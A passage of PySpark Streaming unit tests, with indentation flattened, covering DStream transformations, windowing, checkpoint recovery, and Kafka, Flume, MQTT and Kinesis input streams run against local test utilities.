from pyspark.streaming.kinesis import KinesisUtils, InitialPositionInStream
class PySparkStreamingTestCase(unittest.TestCase):
timeout = 10
duration = .5
@classmethod
def setUpClass(cls):
class_name = cls.__name__
conf = SparkConf().set("spark.default.parallelism", 1)
cls.sc = SparkContext(appName=class_name, conf=conf)
cls.sc.setCheckpointDir("/tmp")
@classmethod
def tearDownClass(cls):
cls.sc.stop()
try:
jSparkContextOption = SparkContext._jvm.SparkContext.get()
if jSparkContextOption.nonEmpty():
jSparkContextOption.get().stop()
except:
pass
def setUp(self):
self.ssc = StreamingContext(self.sc, self.duration)
def tearDown(self):
if self.ssc is not None:
self.ssc.stop(False)
try:
jStreamingContextOption = StreamingContext._jvm.SparkContext.getActive()
if jStreamingContextOption.nonEmpty():
jStreamingContextOption.get().stop(False)
except:
pass
def wait_for(self, result, n):
start_time = time.time()
while len(result) < n and time.time() - start_time < self.timeout:
time.sleep(0.01)
if len(result) < n:
print("timeout after", self.timeout)
def _take(self, dstream, n):
results = []
def take(_, rdd):
if rdd and len(results) < n:
results.extend(rdd.take(n - len(results)))
dstream.foreachRDD(take)
self.ssc.start()
self.wait_for(results, n)
return results
def _collect(self, dstream, n, block=True):
result = []
def get_output(_, rdd):
if rdd and len(result) < n:
r = rdd.collect()
if r:
result.append(r)
dstream.foreachRDD(get_output)
if not block:
return result
self.ssc.start()
self.wait_for(result, n)
return result
def _test_func(self, input, func, expected, sort=False, input2=None):
if not isinstance(input[0], RDD):
input = [self.sc.parallelize(d, 1) for d in input]
input_stream = self.ssc.queueStream(input)
if input2 and not isinstance(input2[0], RDD):
input2 = [self.sc.parallelize(d, 1) for d in input2]
input_stream2 = self.ssc.queueStream(input2) if input2 is not None else None
if input2:
stream = func(input_stream, input_stream2)
else:
stream = func(input_stream)
result = self._collect(stream, len(expected))
if sort:
self._sort_result_based_on_key(result)
self._sort_result_based_on_key(expected)
self.assertEqual(expected, result)
def _sort_result_based_on_key(self, outputs):
for output in outputs:
output.sort(key=lambda x: x[0])
class BasicOperationTests(PySparkStreamingTestCase):
def test_map(self):
input = [range(1, 5), range(5, 9), range(9, 13)]
def func(dstream):
return dstream.map(str)
expected = [list(map(str, x)) for x in input]
self._test_func(input, func, expected)
def test_flatMap(self):
input = [range(1, 5), range(5, 9), range(9, 13)]
def func(dstream):
return dstream.flatMap(lambda x: (x, x * 2))
expected = [list(chain.from_iterable((map(lambda y: [y, y * 2], x))))
for x in input]
self._test_func(input, func, expected)
def test_filter(self):
input = [range(1, 5), range(5, 9), range(9, 13)]
def func(dstream):
return dstream.filter(lambda x: x % 2 == 0)
expected = [[y for y in x if y % 2 == 0] for x in input]
self._test_func(input, func, expected)
def test_count(self):
input = [range(5), range(10), range(20)]
def func(dstream):
return dstream.count()
expected = [[len(x)] for x in input]
self._test_func(input, func, expected)
def test_reduce(self):
input = [range(1, 5), range(5, 9), range(9, 13)]
def func(dstream):
return dstream.reduce(operator.add)
expected = [[reduce(operator.add, x)] for x in input]
self._test_func(input, func, expected)
def test_reduceByKey(self):
input = [[("a", 1), ("a", 1), ("b", 1), ("b", 1)],
[("", 1), ("", 1), ("", 1), ("", 1)],
[(1, 1), (1, 1), (2, 1), (2, 1), (3, 1)]]
def func(dstream):
return dstream.reduceByKey(operator.add)
expected = [[("a", 2), ("b", 2)], [("", 4)], [(1, 2), (2, 2), (3, 1)]]
self._test_func(input, func, expected, sort=True)
def test_mapValues(self):
input = [[("a", 2), ("b", 2), ("c", 1), ("d", 1)],
[(0, 4), (1, 1), (2, 2), (3, 3)],
[(1, 1), (2, 1), (3, 1), (4, 1)]]
def func(dstream):
return dstream.mapValues(lambda x: x + 10)
expected = [[("a", 12), ("b", 12), ("c", 11), ("d", 11)],
[(0, 14), (1, 11), (2, 12), (3, 13)],
[(1, 11), (2, 11), (3, 11), (4, 11)]]
self._test_func(input, func, expected, sort=True)
def test_flatMapValues(self):
input = [[("a", 2), ("b", 2), ("c", 1), ("d", 1)],
[(0, 4), (1, 1), (2, 1), (3, 1)],
[(1, 1), (2, 1), (3, 1), (4, 1)]]
def func(dstream):
return dstream.flatMapValues(lambda x: (x, x + 10))
expected = [[("a", 2), ("a", 12), ("b", 2), ("b", 12),
("c", 1), ("c", 11), ("d", 1), ("d", 11)],
[(0, 4), (0, 14), (1, 1), (1, 11), (2, 1), (2, 11), (3, 1), (3, 11)],
[(1, 1), (1, 11), (2, 1), (2, 11), (3, 1), (3, 11), (4, 1), (4, 11)]]
self._test_func(input, func, expected)
def test_glom(self):
input = [range(1, 5), range(5, 9), range(9, 13)]
rdds = [self.sc.parallelize(r, 2) for r in input]
def func(dstream):
return dstream.glom()
expected = [[[1, 2], [3, 4]], [[5, 6], [7, 8]], [[9, 10], [11, 12]]]
self._test_func(rdds, func, expected)
def test_mapPartitions(self):
input = [range(1, 5), range(5, 9), range(9, 13)]
rdds = [self.sc.parallelize(r, 2) for r in input]
def func(dstream):
def f(iterator):
yield sum(iterator)
return dstream.mapPartitions(f)
expected = [[3, 7], [11, 15], [19, 23]]
self._test_func(rdds, func, expected)
def test_countByValue(self):
input = [list(range(1, 5)) * 2, list(range(5, 7)) + list(range(5, 9)), ["a", "a", "b", ""]]
def func(dstream):
return dstream.countByValue()
expected = [[4], [4], [3]]
self._test_func(input, func, expected)
def test_groupByKey(self):
input = [[(1, 1), (2, 1), (3, 1), (4, 1)],
[(1, 1), (1, 1), (1, 1), (2, 1), (2, 1), (3, 1)],
[("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 1), ("", 1)]]
def func(dstream):
return dstream.groupByKey().mapValues(list)
expected = [[(1, [1]), (2, [1]), (3, [1]), (4, [1])],
[(1, [1, 1, 1]), (2, [1, 1]), (3, [1])],
[("a", [1, 1]), ("b", [1]), ("", [1, 1, 1])]]
self._test_func(input, func, expected, sort=True)
def test_combineByKey(self):
input = [[(1, 1), (2, 1), (3, 1), (4, 1)],
[(1, 1), (1, 1), (1, 1), (2, 1), (2, 1), (3, 1)],
[("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 1), ("", 1)]]
def func(dstream):
def add(a, b):
return a + str(b)
return dstream.combineByKey(str, add, add)
expected = [[(1, "1"), (2, "1"), (3, "1"), (4, "1")],
[(1, "111"), (2, "11"), (3, "1")],
[("a", "11"), ("b", "1"), ("", "111")]]
self._test_func(input, func, expected, sort=True)
def test_repartition(self):
input = [range(1, 5), range(5, 9)]
rdds = [self.sc.parallelize(r, 2) for r in input]
def func(dstream):
return dstream.repartition(1).glom()
expected = [[[1, 2, 3, 4]], [[5, 6, 7, 8]]]
self._test_func(rdds, func, expected)
def test_union(self):
input1 = [range(3), range(5), range(6)]
input2 = [range(3, 6), range(5, 6)]
def func(d1, d2):
return d1.union(d2)
expected = [list(range(6)), list(range(6)), list(range(6))]
self._test_func(input1, func, expected, input2=input2)
def test_cogroup(self):
input = [[(1, 1), (2, 1), (3, 1)],
[(1, 1), (1, 1), (1, 1), (2, 1)],
[("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 1)]]
input2 = [[(1, 2)],
[(4, 1)],
[("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 2)]]
def func(d1, d2):
return d1.cogroup(d2).mapValues(lambda vs: tuple(map(list, vs)))
expected = [[(1, ([1], [2])), (2, ([1], [])), (3, ([1], []))],
[(1, ([1, 1, 1], [])), (2, ([1], [])), (4, ([], [1]))],
[("a", ([1, 1], [1, 1])), ("b", ([1], [1])), ("", ([1, 1], [1, 2]))]]
self._test_func(input, func, expected, sort=True, input2=input2)
def test_join(self):
input = [[('a', 1), ('b', 2)]]
input2 = [[('b', 3), ('c', 4)]]
def func(a, b):
return a.join(b)
expected = [[('b', (2, 3))]]
self._test_func(input, func, expected, True, input2)
def test_left_outer_join(self):
input = [[('a', 1), ('b', 2)]]
input2 = [[('b', 3), ('c', 4)]]
def func(a, b):
return a.leftOuterJoin(b)
expected = [[('a', (1, None)), ('b', (2, 3))]]
self._test_func(input, func, expected, True, input2)
def test_right_outer_join(self):
input = [[('a', 1), ('b', 2)]]
input2 = [[('b', 3), ('c', 4)]]
def func(a, b):
return a.rightOuterJoin(b)
expected = [[('b', (2, 3)), ('c', (None, 4))]]
self._test_func(input, func, expected, True, input2)
def test_full_outer_join(self):
input = [[('a', 1), ('b', 2)]]
input2 = [[('b', 3), ('c', 4)]]
def func(a, b):
return a.fullOuterJoin(b)
expected = [[('a', (1, None)), ('b', (2, 3)), ('c', (None, 4))]]
self._test_func(input, func, expected, True, input2)
def test_update_state_by_key(self):
def updater(vs, s):
if not s:
s = []
s.extend(vs)
return s
input = [[('k', i)] for i in range(5)]
def func(dstream):
return dstream.updateStateByKey(updater)
expected = [[0], [0, 1], [0, 1, 2], [0, 1, 2, 3], [0, 1, 2, 3, 4]]
expected = [[('k', v)] for v in expected]
self._test_func(input, func, expected)
class WindowFunctionTests(PySparkStreamingTestCase):
timeout = 15
def test_window(self):
input = [range(1), range(2), range(3), range(4), range(5)]
def func(dstream):
return dstream.window(1.5, .5).count()
expected = [[1], [3], [6], [9], [12], [9], [5]]
self._test_func(input, func, expected)
def test_count_by_window(self):
input = [range(1), range(2), range(3), range(4), range(5)]
def func(dstream):
return dstream.countByWindow(1.5, .5)
expected = [[1], [3], [6], [9], [12], [9], [5]]
self._test_func(input, func, expected)
def test_count_by_window_large(self):
input = [range(1), range(2), range(3), range(4), range(5), range(6)]
def func(dstream):
return dstream.countByWindow(2.5, .5)
expected = [[1], [3], [6], [10], [15], [20], [18], [15], [11], [6]]
self._test_func(input, func, expected)
def test_count_by_value_and_window(self):
input = [range(1), range(2), range(3), range(4), range(5), range(6)]
def func(dstream):
return dstream.countByValueAndWindow(2.5, .5)
expected = [[1], [2], [3], [4], [5], [6], [6], [6], [6], [6]]
self._test_func(input, func, expected)
def test_group_by_key_and_window(self):
input = [[('a', i)] for i in range(5)]
def func(dstream):
return dstream.groupByKeyAndWindow(1.5, .5).mapValues(list)
expected = [[('a', [0])], [('a', [0, 1])], [('a', [0, 1, 2])], [('a', [1, 2, 3])],
[('a', [2, 3, 4])], [('a', [3, 4])], [('a', [4])]]
self._test_func(input, func, expected)
def test_reduce_by_invalid_window(self):
input1 = [range(3), range(5), range(1), range(6)]
d1 = self.ssc.queueStream(input1)
self.assertRaises(ValueError, lambda: d1.reduceByKeyAndWindow(None, None, 0.1, 0.1))
self.assertRaises(ValueError, lambda: d1.reduceByKeyAndWindow(None, None, 1, 0.1))
class StreamingContextTests(PySparkStreamingTestCase):
duration = 0.1
setupCalled = False
def _add_input_stream(self):
inputs = [range(1, x) for x in range(101)]
stream = self.ssc.queueStream(inputs)
self._collect(stream, 1, block=False)
def test_stop_only_streaming_context(self):
self._add_input_stream()
self.ssc.start()
self.ssc.stop(False)
self.assertEqual(len(self.sc.parallelize(range(5), 5).glom().collect()), 5)
def test_stop_multiple_times(self):
self._add_input_stream()
self.ssc.start()
self.ssc.stop(False)
self.ssc.stop(False)
def test_queue_stream(self):
input = [list(range(i + 1)) for i in range(3)]
dstream = self.ssc.queueStream(input)
result = self._collect(dstream, 3)
self.assertEqual(input, result)
def test_text_file_stream(self):
d = tempfile.mkdtemp()
self.ssc = StreamingContext(self.sc, self.duration)
dstream2 = self.ssc.textFileStream(d).map(int)
result = self._collect(dstream2, 2, block=False)
self.ssc.start()
for name in ('a', 'b'):
time.sleep(1)
with open(os.path.join(d, name), "w") as f:
f.writelines(["%d\n" % i for i in range(10)])
self.wait_for(result, 2)
self.assertEqual([list(range(10)), list(range(10))], result)
def test_binary_records_stream(self):
d = tempfile.mkdtemp()
self.ssc = StreamingContext(self.sc, self.duration)
dstream = self.ssc.binaryRecordsStream(d, 10).map(
lambda v: struct.unpack("10b", bytes(v)))
result = self._collect(dstream, 2, block=False)
self.ssc.start()
for name in ('a', 'b'):
time.sleep(1)
with open(os.path.join(d, name), "wb") as f:
f.write(bytearray(range(10)))
self.wait_for(result, 2)
self.assertEqual([list(range(10)), list(range(10))], [list(v[0]) for v in result])
def test_union(self):
input = [list(range(i + 1)) for i in range(3)]
dstream = self.ssc.queueStream(input)
dstream2 = self.ssc.queueStream(input)
dstream3 = self.ssc.union(dstream, dstream2)
result = self._collect(dstream3, 3)
expected = [i * 2 for i in input]
self.assertEqual(expected, result)
def test_transform(self):
dstream1 = self.ssc.queueStream([[1]])
dstream2 = self.ssc.queueStream([[2]])
dstream3 = self.ssc.queueStream([[3]])
def func(rdds):
rdd1, rdd2, rdd3 = rdds
return rdd2.union(rdd3).union(rdd1)
dstream = self.ssc.transform([dstream1, dstream2, dstream3], func)
self.assertEqual([2, 3, 1], self._take(dstream, 3))
def test_get_active(self):
self.assertEqual(StreamingContext.getActive(), None)
self.ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
self.ssc.start()
self.assertEqual(StreamingContext.getActive(), self.ssc)
self.ssc.stop(False)
self.assertEqual(StreamingContext.getActive(), None)
self.ssc = StreamingContext(self.sc, self.duration)
self.ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
self.ssc.start()
self.assertEqual(StreamingContext.getActive(), self.ssc)
self.ssc._jssc.stop(False)
self.assertEqual(StreamingContext.getActive(), None)
def test_get_active_or_create(self):
self.ssc = None
self.assertEqual(StreamingContext.getActive(), None)
def setupFunc():
ssc = StreamingContext(self.sc, self.duration)
ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
self.setupCalled = True
return ssc
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(None, setupFunc)
self.assertTrue(self.setupCalled)
self.ssc.start()
self.setupCalled = False
self.assertEqual(StreamingContext.getActiveOrCreate(None, setupFunc), self.ssc)
self.assertFalse(self.setupCalled)
self.ssc.stop(False)
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(None, setupFunc)
self.assertTrue(self.setupCalled)
self.ssc = StreamingContext(self.sc, self.duration)
self.ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
self.ssc.start()
self.assertEqual(StreamingContext.getActive(), self.ssc)
self.ssc._jssc.stop(False)
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(None, setupFunc)
self.assertTrue(self.setupCalled)
class CheckpointTests(unittest.TestCase):
setupCalled = False
@staticmethod
def tearDownClass():
jStreamingContextOption = StreamingContext._jvm.SparkContext.getActive()
if jStreamingContextOption.nonEmpty():
jStreamingContextOption.get().stop()
jSparkContextOption = SparkContext._jvm.SparkContext.get()
if jSparkContextOption.nonEmpty():
jSparkContextOption.get().stop()
def tearDown(self):
if self.ssc is not None:
self.ssc.stop(True)
if self.sc is not None:
self.sc.stop()
if self.cpd is not None:
shutil.rmtree(self.cpd)
def test_get_or_create_and_get_active_or_create(self):
inputd = tempfile.mkdtemp()
outputd = tempfile.mkdtemp() + "/"
def updater(vs, s):
return sum(vs, s or 0)
def setup():
conf = SparkConf().set("spark.default.parallelism", 1)
sc = SparkContext(conf=conf)
ssc = StreamingContext(sc, 0.5)
dstream = ssc.textFileStream(inputd).map(lambda x: (x, 1))
wc = dstream.updateStateByKey(updater)
wc.map(lambda x: "%s,%d" % x).saveAsTextFiles(outputd + "test")
wc.checkpoint(.5)
self.setupCalled = True
return ssc
self.cpd = tempfile.mkdtemp("test_streaming_cps")
self.setupCalled = False
self.ssc = StreamingContext.getOrCreate(self.cpd, setup)
self.assertFalse(self.setupCalled)
self.ssc.start()
def check_output(n):
while not os.listdir(outputd):
time.sleep(0.01)
time.sleep(1)
with open(os.path.join(inputd, str(n)), 'w') as f:
f.writelines(["%d\n" % i for i in range(10)])
while True:
p = os.path.join(outputd, max(os.listdir(outputd)))
if '_SUCCESS' not in os.listdir(p):
time.sleep(0.01)
continue
ordd = self.ssc.sparkContext.textFile(p).map(lambda line: line.split(","))
d = ordd.values().map(int).collect()
if not d:
time.sleep(0.01)
continue
self.assertEqual(10, len(d))
s = set(d)
self.assertEqual(1, len(s))
m = s.pop()
if n > m:
continue
self.assertEqual(n, m)
break
check_output(1)
check_output(2)
self.ssc.stop(True, True)
time.sleep(1)
self.setupCalled = False
self.ssc = StreamingContext.getOrCreate(self.cpd, setup)
self.assertFalse(self.setupCalled)
self.ssc.start()
check_output(3)
self.ssc.stop(True, True)
time.sleep(1)
sc = SparkContext(SparkConf())
self.setupCalled = False
self.ssc = StreamingContext.getOrCreate(self.cpd, setup)
self.assertFalse(self.setupCalled)
self.assertTrue(self.ssc.sparkContext == sc)
self.ssc.stop(True, True)
time.sleep(1)
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(self.cpd, setup)
self.assertFalse(self.setupCalled)
self.ssc.start()
check_output(4)
self.setupCalled = False
self.assertEqual(StreamingContext.getActiveOrCreate(self.cpd, setup), self.ssc)
self.assertFalse(self.setupCalled)
self.ssc.stop(True, True)
time.sleep(1)
self.sc = SparkContext(SparkConf())
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(self.cpd, setup)
self.assertFalse(self.setupCalled)
self.assertTrue(self.ssc.sparkContext == sc)
self.ssc.stop(True, True)
shutil.rmtree(self.cpd)
time.sleep(1)
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(self.cpd, setup)
self.assertTrue(self.setupCalled)
self.ssc.stop(True, True)
class KafkaStreamTests(PySparkStreamingTestCase):
timeout = 20
duration = 1
def setUp(self):
super(KafkaStreamTests, self).setUp()
kafkaTestUtilsClz = self.ssc._jvm.java.lang.Thread.currentThread().getContextClassLoader()\
.loadClass("org.apache.spark.streaming.kafka.KafkaTestUtils")
self._kafkaTestUtils = kafkaTestUtilsClz.newInstance()
self._kafkaTestUtils.setup()
def tearDown(self):
if self._kafkaTestUtils is not None:
self._kafkaTestUtils.teardown()
self._kafkaTestUtils = None
super(KafkaStreamTests, self).tearDown()
def _randomTopic(self):
return "topic-%d" % random.randint(0, 10000)
def _validateStreamResult(self, sendData, stream):
result = {}
for i in chain.from_iterable(self._collect(stream.map(lambda x: x[1]),
sum(sendData.values()))):
result[i] = result.get(i, 0) + 1
self.assertEqual(sendData, result)
def _validateRddResult(self, sendData, rdd):
result = {}
for i in rdd.map(lambda x: x[1]).collect():
result[i] = result.get(i, 0) + 1
self.assertEqual(sendData, result)
def test_kafka_stream(self):
topic = self._randomTopic()
sendData = {"a": 3, "b": 5, "c": 10}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
stream = KafkaUtils.createStream(self.ssc, self._kafkaTestUtils.zkAddress(),
"test-streaming-consumer", {topic: 1},
{"auto.offset.reset": "smallest"})
self._validateStreamResult(sendData, stream)
def test_kafka_direct_stream(self):
topic = self._randomTopic()
sendData = {"a": 1, "b": 2, "c": 3}
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress(),
"auto.offset.reset": "smallest"}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams)
self._validateStreamResult(sendData, stream)
@unittest.skipIf(sys.version >= "3", "long type not support")
def test_kafka_direct_stream_from_offset(self):
topic = self._randomTopic()
sendData = {"a": 1, "b": 2, "c": 3}
fromOffsets = {TopicAndPartition(topic, 0): long(0)}
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams, fromOffsets)
self._validateStreamResult(sendData, stream)
@unittest.skipIf(sys.version >= "3", "long type not support")
def test_kafka_rdd(self):
topic = self._randomTopic()
sendData = {"a": 1, "b": 2}
offsetRanges = [OffsetRange(topic, 0, long(0), long(sum(sendData.values())))]
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
rdd = KafkaUtils.createRDD(self.sc, kafkaParams, offsetRanges)
self._validateRddResult(sendData, rdd)
@unittest.skipIf(sys.version >= "3", "long type not support")
def test_kafka_rdd_with_leaders(self):
topic = self._randomTopic()
sendData = {"a": 1, "b": 2, "c": 3}
offsetRanges = [OffsetRange(topic, 0, long(0), long(sum(sendData.values())))]
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
address = self._kafkaTestUtils.brokerAddress().split(":")
leaders = {TopicAndPartition(topic, 0): Broker(address[0], int(address[1]))}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
rdd = KafkaUtils.createRDD(self.sc, kafkaParams, offsetRanges, leaders)
self._validateRddResult(sendData, rdd)
@unittest.skipIf(sys.version >= "3", "long type not support")
def test_kafka_rdd_get_offsetRanges(self):
topic = self._randomTopic()
sendData = {"a": 3, "b": 4, "c": 5}
offsetRanges = [OffsetRange(topic, 0, long(0), long(sum(sendData.values())))]
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
rdd = KafkaUtils.createRDD(self.sc, kafkaParams, offsetRanges)
self.assertEqual(offsetRanges, rdd.offsetRanges())
@unittest.skipIf(sys.version >= "3", "long type not support")
def test_kafka_direct_stream_foreach_get_offsetRanges(self):
topic = self._randomTopic()
sendData = {"a": 1, "b": 2, "c": 3}
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress(),
"auto.offset.reset": "smallest"}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams)
offsetRanges = []
def getOffsetRanges(_, rdd):
for o in rdd.offsetRanges():
offsetRanges.append(o)
stream.foreachRDD(getOffsetRanges)
self.ssc.start()
self.wait_for(offsetRanges, 1)
self.assertEqual(offsetRanges, [OffsetRange(topic, 0, long(0), long(6))])
@unittest.skipIf(sys.version >= "3", "long type not support")
def test_kafka_direct_stream_transform_get_offsetRanges(self):
topic = self._randomTopic()
sendData = {"a": 1, "b": 2, "c": 3}
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress(),
"auto.offset.reset": "smallest"}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams)
offsetRanges = []
def transformWithOffsetRanges(rdd):
for o in rdd.offsetRanges():
offsetRanges.append(o)
return rdd
stream.transform(transformWithOffsetRanges).map(lambda kv: kv[1]).count().pprint()
self.ssc.start()
self.wait_for(offsetRanges, 1)
self.assertEqual(offsetRanges, [OffsetRange(topic, 0, long(0), long(6))])
def test_topic_and_partition_equality(self):
topic_and_partition_a = TopicAndPartition("foo", 0)
topic_and_partition_b = TopicAndPartition("foo", 0)
topic_and_partition_c = TopicAndPartition("bar", 0)
topic_and_partition_d = TopicAndPartition("foo", 1)
self.assertEqual(topic_and_partition_a, topic_and_partition_b)
self.assertNotEqual(topic_and_partition_a, topic_and_partition_c)
self.assertNotEqual(topic_and_partition_a, topic_and_partition_d)
class FlumeStreamTests(PySparkStreamingTestCase):
timeout = 20
duration = 1
def setUp(self):
super(FlumeStreamTests, self).setUp()
utilsClz = self.ssc._jvm.java.lang.Thread.currentThread().getContextClassLoader() \
.loadClass("org.apache.spark.streaming.flume.FlumeTestUtils")
self._utils = utilsClz.newInstance()
def tearDown(self):
if self._utils is not None:
self._utils.close()
self._utils = None
super(FlumeStreamTests, self).tearDown()
def _startContext(self, n, compressed):
dstream = FlumeUtils.createStream(self.ssc, "localhost", self._utils.getTestPort(),
enableDecompression=compressed)
result = []
def get_output(_, rdd):
for event in rdd.collect():
if len(result) < n:
result.append(event)
dstream.foreachRDD(get_output)
self.ssc.start()
return result
def _validateResult(self, input, result):
header = {"test": "header"}
self.assertEqual(len(input), len(result))
for i in range(0, len(input)):
self.assertEqual(header, result[i][0])
self.assertEqual(input[i], result[i][1])
def _writeInput(self, input, compressed):
start_time = time.time()
while True:
try:
self._utils.writeInput(input, compressed)
break
except:
if time.time() - start_time < self.timeout:
time.sleep(0.01)
else:
raise
def test_flume_stream(self):
input = [str(i) for i in range(1, 101)]
result = self._startContext(len(input), False)
self._writeInput(input, False)
self.wait_for(result, len(input))
self._validateResult(input, result)
def test_compressed_flume_stream(self):
input = [str(i) for i in range(1, 101)]
result = self._startContext(len(input), True)
self._writeInput(input, True)
self.wait_for(result, len(input))
self._validateResult(input, result)
class FlumePollingStreamTests(PySparkStreamingTestCase):
timeout = 20
duration = 1
maxAttempts = 5
def setUp(self):
utilsClz = \
self.sc._jvm.java.lang.Thread.currentThread().getContextClassLoader() \
.loadClass("org.apache.spark.streaming.flume.PollingFlumeTestUtils")
self._utils = utilsClz.newInstance()
def tearDown(self):
if self._utils is not None:
self._utils.close()
self._utils = None
def _writeAndVerify(self, ports):
ssc = StreamingContext(self.sc, self.duration)
try:
addresses = [("localhost", port) for port in ports]
dstream = FlumeUtils.createPollingStream(
ssc,
addresses,
maxBatchSize=self._utils.eventsPerBatch(),
parallelism=5)
outputBuffer = []
def get_output(_, rdd):
for e in rdd.collect():
outputBuffer.append(e)
dstream.foreachRDD(get_output)
ssc.start()
self._utils.sendDatAndEnsureAllDataHasBeenReceived()
self.wait_for(outputBuffer, self._utils.getTotalEvents())
outputHeaders = [event[0] for event in outputBuffer]
outputBodies = [event[1] for event in outputBuffer]
self._utils.assertOutput(outputHeaders, outputBodies)
finally:
ssc.stop(False)
def _testMultipleTimes(self, f):
attempt = 0
while True:
try:
f()
break
except:
attempt += 1
if attempt >= self.maxAttempts:
raise
else:
import traceback
traceback.print_exc()
def _testFlumePolling(self):
try:
port = self._utils.startSingleSink()
self._writeAndVerify([port])
self._utils.assertChannelsAreEmpty()
finally:
self._utils.close()
def _testFlumePollingMultipleHosts(self):
try:
port = self._utils.startSingleSink()
self._writeAndVerify([port])
self._utils.assertChannelsAreEmpty()
finally:
self._utils.close()
def test_flume_polling(self):
self._testMultipleTimes(self._testFlumePolling)
def test_flume_polling_multiple_hosts(self):
self._testMultipleTimes(self._testFlumePollingMultipleHosts)
class MQTTStreamTests(PySparkStreamingTestCase):
timeout = 20
duration = 1
def setUp(self):
super(MQTTStreamTests, self).setUp()
MQTTTestUtilsClz = self.ssc._jvm.java.lang.Thread.currentThread().getContextClassLoader() \
.loadClass("org.apache.spark.streaming.mqtt.MQTTTestUtils")
self._MQTTTestUtils = MQTTTestUtilsClz.newInstance()
self._MQTTTestUtils.setup()
def tearDown(self):
if self._MQTTTestUtils is not None:
self._MQTTTestUtils.teardown()
self._MQTTTestUtils = None
super(MQTTStreamTests, self).tearDown()
def _randomTopic(self):
return "topic-%d" % random.randint(0, 10000)
def _startContext(self, topic):
stream = MQTTUtils.createStream(self.ssc, "tcp://" + self._MQTTTestUtils.brokerUri(), topic)
result = []
def getOutput(_, rdd):
for data in rdd.collect():
result.append(data)
stream.foreachRDD(getOutput)
self.ssc.start()
return result
def test_mqtt_stream(self):
sendData = "MQTT demo for spark streaming"
topic = self._randomTopic()
result = self._startContext(topic)
def retry():
self._MQTTTestUtils.publishData(topic, sendData)
self.assertTrue(len(result) > 0)
self.assertEqual(sendData, result[0])
self._retry_or_timeout(retry)
def _retry_or_timeout(self, test_func):
start_time = time.time()
while True:
try:
test_func()
break
except:
if time.time() - start_time > self.timeout:
raise
time.sleep(0.01)
class KinesisStreamTests(PySparkStreamingTestCase):
def test_kinesis_stream_api(self):
# Don't start the StreamingContext because we cannot test it in Jenkins
kinesisStream1 = KinesisUtils.createStream(
self.ssc, "myAppNam", "mySparkStream",
"https://kinesis.us-west-2.amazonaws.com", "us-west-2",
InitialPositionInStream.LATEST, 2, StorageLevel.MEMORY_AND_DISK_2)
kinesisStream2 = KinesisUtils.createStream(
self.ssc, "myAppNam", "mySparkStream",
"https://kinesis.us-west-2.amazonaws.com", "us-west-2",
InitialPositionInStream.LATEST, 2, StorageLevel.MEMORY_AND_DISK_2,
"awsAccessKey", "awsSecretKey")
def test_kinesis_stream(self):
if not are_kinesis_tests_enabled:
sys.stderr.write(
"Skipped test_kinesis_stream (enable by setting environment variable %s=1"
% kinesis_test_environ_var)
return
import random
kinesisAppName = ("KinesisStreamTests-%d" % abs(random.randint(0, 10000000)))
kinesisTestUtilsClz = \
self.sc._jvm.java.lang.Thread.currentThread().getContextClassLoader() \
.loadClass("org.apache.spark.streaming.kinesis.KinesisTestUtils")
kinesisTestUtils = kinesisTestUtilsClz.newInstance()
try:
kinesisTestUtils.createStream()
aWSCredentials = kinesisTestUtils.getAWSCredentials()
stream = KinesisUtils.createStream(
self.ssc, kinesisAppName, kinesisTestUtils.streamName(),
kinesisTestUtils.endpointUrl(), kinesisTestUtils.regionName(),
InitialPositionInStream.LATEST, 10, StorageLevel.MEMORY_ONLY,
aWSCredentials.getAWSAccessKeyId(), aWSCredentials.getAWSSecretKey())
outputBuffer = []
def get_output(_, rdd):
for e in rdd.collect():
outputBuffer.append(e)
stream.foreachRDD(get_output)
self.ssc.start()
testData = [i for i in range(1, 11)]
expectedOutput = set([str(i) for i in testData])
start_time = time.time()
while time.time() - start_time < 120:
kinesisTestUtils.pushData(testData)
if expectedOutput == set(outputBuffer):
break
time.sleep(10)
self.assertEqual(expectedOutput, set(outputBuffer))
except:
import traceback
traceback.print_exc()
raise
finally:
self.ssc.stop(False)
kinesisTestUtils.deleteStream()
kinesisTestUtils.deleteDynamoDBTable(kinesisAppName)
def search_jar(dir, name_prefix):
ignored_jar_suffixes = ("javadoc.jar", "sources.jar", "test-sources.jar", "tests.jar")
jars = (glob.glob(os.path.join(dir, "target/scala-*/" + name_prefix + "-*.jar")) +
